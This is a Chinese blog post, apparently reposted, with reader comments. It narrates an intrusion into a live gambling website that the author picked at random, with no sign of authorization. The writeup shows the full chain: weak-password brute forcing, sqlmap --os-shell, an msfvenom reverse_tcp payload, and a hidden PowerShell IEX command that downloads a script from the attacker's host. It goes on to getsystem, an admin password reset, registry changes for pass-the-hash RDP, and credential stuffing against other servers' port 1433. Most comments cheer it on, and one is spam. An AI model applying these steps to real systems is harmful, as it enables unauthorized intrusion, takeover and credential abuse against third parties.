闲着无聊,网上随便找了一个菠菜进行简单测试,并做笔记记录,大佬们轻喷,有什么不足之处请指教。
弱口令
访问网站就是一个登录页面,没有验证码直接 bp 开启,成功爆出弱口令 admin/123456,直接进入后台。

sql注入获取权限
翻看了很多功能点,在一处功能点发现上传接口,并尝试上传文件,发现无法上传,加了白名单。直接选择放弃,继续寻找。在某一个 /GroupMember.aspx?gid= 参数上加上单引号,直接报错,SQL 注入这不就来了么。

说干就干,直接 SQLMAP

发现为 MSSQL,且 DBA 权限,直接 --os-shell

上线msf
已经获取普通权限,接下来就是上线 msf 提权。msf 生成 powershell 脚本,并放置在网站目录下
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

Vps 开启监听

使用 powershell 上线 session
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

如果想要通过 url 拼接堆叠执行 powershell 会存在一个问题,就是单引号闭合问题。我们可以通过对 powershell 进行编码一下,这样就可以绕过单引号的问题。下面推荐一个不错的网站。
https://r0yanx.com/tools/java_exec_encode/
提权
session 已经上线,接下来目标就是获取 system 权限。很幸运直接 getsystem 可以获取 system 权限。如果需要提权推荐土豆家族提权,实战中成功率很高,影响的服务器版本也很多。

迁移一下进程,防止进程掉线。

远程登录服务器
发现服务器开启 3389 端口,因为是 system 权限,且为 2012 系统,大于 2008 版本都是无法抓到明文密码,直接修改 adminnistrator 密码。(实战中不推荐直接修改管理员密码)


利用hash远程登录管理员账号
因为是 win2012 无法获取明文密码,直接修改管理员密码稍有些不妥。尝试通过获取管理员 NTLM 远程登录机器。(并非同一台,这只是提供一个思路)

使用 hash 远程登录 RDP,需要开启 "Restricted Admin Mode"
// 开启Restricted Admin mode
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
// 查看是否已开启,0x0则表示开启
REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"

成功利用 hash 远程管理员桌面


其他
前期发现 1433 端口开放着,寻找数据库配置文件,登录数据库。

通过 fofa 找了一下,资产还是挺多的,且很多都开放 1433 端口,猜测会存在同一个人部署的网站,尝试用获取的密码对这些资产的 1433 端口进行爆破,成功撞到几台数据库,且都是 sa 权限。结束。

本文作者:kone原文地址:https://xz.aliyun.com/t/12501

巴基斯坦 1F
弱口令还是admin/123456?这菠菜也太不设防了吧😂
湖北省武汉市 2F
上传白名单拦了就跑,后面SQL注入倒是挺顺的
北京市 3F
MSSQL直接DBA权限,运气真不错啊
韩国 4F
求问下那个powershell编码网站还能用吗?刚试了打不开🤔
江苏省常州市武进区 5F
我之前也测过类似站,3389开了但死活提不了权,楼主这getsystem一次成功有点羡慕
陕西省西安市 6F
又是菠菜站…感觉这类目标漏洞都快成模板了
湖北省武汉市 7F
win2012改密码确实风险大,hash登录那步操作很稳👍
韩国 8F
土豆家族提权现在还管用?我以为早被修完了
辽宁省抚顺市 9F
看到1433爆破成功那段,突然想起自己上周撞库失败的经历…唉
日本 B1
@ Fandango 感觉这种站资产都挺多的,撞库成功率应该不低。
北京市 10F
直接–os-shell上线msf,这流程丝滑得有点离谱啊
日本 11F
这波操作太丝滑了,从弱口令到拿shell一气呵成,羡慕这运气。
日本 12F
那个绕过单引号的编码网站收藏了,之前就卡在这。
泰国 13F
修改管理员密码确实有点莽,不过测试环境无所谓了。
上海市 14F
弱口令爆破那里,直接用bp开搞,速度应该很快吧?
上海市 15F
之前也搞过几个站,上传口加白名单是常态,后面基本都是靠注入。
乌克兰 16F
我关注这样的资源, 这里展示真正的旅游。这个页面 就是 正是这样的。加油。 [url=https://iqvel.com/zh-Hans/country/%E6%9F%AC%E5%9F%94%E5%AF%A8]最佳季節[/url] 有教育意义的 旅行者博客! 请继续保持!
日本 17F
看到getsystem成功就想起我上次提权搞了俩小时,人麻了。
福建省南平市 18F
@千问 你行你上啊,这波操作我服了
美国 B1
@ 月影孤行 服了就行,这波操作确实有点东西,弱口令和SQL注入都给碰上了。